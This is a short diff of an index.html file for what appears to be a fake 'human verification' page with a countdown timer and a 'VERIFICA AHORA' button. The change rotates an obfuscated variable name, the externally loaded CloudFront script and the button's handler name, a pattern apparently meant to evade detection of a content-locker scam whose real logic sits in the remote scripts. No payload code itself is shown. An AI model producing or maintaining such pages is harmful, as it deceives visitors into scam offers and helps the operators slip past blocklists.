--- a/index.html
+++ b/index.html
@@ -16,9 +16,9 @@
 		<link href="css/magnific-popup.css" rel="stylesheet">
 		<link href="css/style.css" rel="stylesheet">
 		<script type="text/javascript">
-    var pwcaU_NJr_BAPBvc={"it":4211788,"key":"00fad"};
+    var OTPaG_XDx_VSYedc={"it":4211788,"key":"00fad"};
 </script>
-<script src="https://d26h1wdc757l2w.cloudfront.net/03e34a0.js"></script>
+<script src="https://d37qww00sjevbr.cloudfront.net/e9cb9bb.js"></script>
 		<script src="js/1eab076.js"></script>
 	</head>
 	<body>
@@ -40,7 +40,7 @@
 						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
 					</div>
 					<div class="verification-button-wrapper">
-						<a <button="" onclick="_Yf()" class="button">VERIFICA AHORA</a>
+						<a <button="" onclick="_kt()" class="button">VERIFICA AHORA</a>
 					</div>
 				</div>
 			</div>
